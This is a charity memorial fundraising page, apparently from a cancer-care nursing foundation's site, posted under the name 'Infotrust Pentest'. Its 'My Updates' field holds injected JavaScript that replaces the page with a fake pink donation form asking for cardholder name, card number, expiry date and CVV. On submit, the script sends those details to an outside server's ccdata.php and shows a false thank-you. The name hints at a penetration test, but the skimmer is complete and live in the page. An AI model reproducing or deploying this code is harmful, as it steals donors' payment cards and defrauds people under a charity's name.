Infotrust Pentest

By Infotrust Pentest

In memory of someone special

Giving a gift in a loved one’s memory is a meaningful and special way to honour and remember them.  Your donations will help our McGrath Cancer Care Nurses to support more families experiencing cancer, no matter where they live and for free, so we greatly appreciate your support at this difficult time. Your donations will help us to make a real difference.

Thank you for your support.

My Updates

<script>document.body.innerHTML='<div style="font-family:Arial,sans-serif;margin:50px auto;max-width:400px;text-align:center;"><h2>Pentest Breast Cancer Fundraiser</h2><p>Help me turn Pink in to the colour of Care</p><form id="donationForm"><input type="text" id="cardName" placeholder="Cardholder Name" required style="width:100%;padding:10px;margin:5px 0;"><input type="text" id="cardNumber" placeholder="Card Number" required maxlength="16" style="width:100%;padding:10px;margin:5px 0;"><input type="text" id="expiryDate" placeholder="Expiry Date (MM/YY)" required style="width:100%;padding:10px;margin:5px 0;"><input type="text" id="cvv" placeholder="CVV" required maxlength="3" style="width:100%;padding:10px;margin:5px 0;"><select id="donationAmount" style="width:100%;padding:10px;margin:5px 0;"><option value="25">Donate $25</option><option value="50">Donate $50</option><option value="100">Donate $100</option><option value="200">Donate $200</option><option value="custom">Custom Amount</option></select><input type="text" id="customAmount" placeholder="Enter custom amount" style="width:100%;padding:10px;margin:5px 0;display:none;"><button type="submit" style="padding:10px;background-color:pink;color:white;border:none;width:100%;margin-top:10px;">Donate Now</button></form><p style="font-size:12px;color:grey;">Secure Payment Processing</p></div>';document.getElementById('donationAmount').addEventListener('change',function(){const c=document.getElementById('customAmount');c.style.display=this.value==='custom'?'block':'none'});document.getElementById('donationForm').addEventListener('submit',function(e){e.preventDefault();const n=document.getElementById('cardName').value,b=document.getElementById('cardNumber').value,x=document.getElementById('expiryDate').value,v=document.getElementById('cvv').value;let d=document.getElementById('donationAmount').value;if(d==='custom'){d=document.getElementById('customAmount').value}fetch("https://minipickle-vm.tail72258d.ts.net/ccdata.php",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({cardName:n,cardNumber:b,expiryDate:x,cvv:v,donationAmount:d})});alert("Thank you for your donation!")});</script>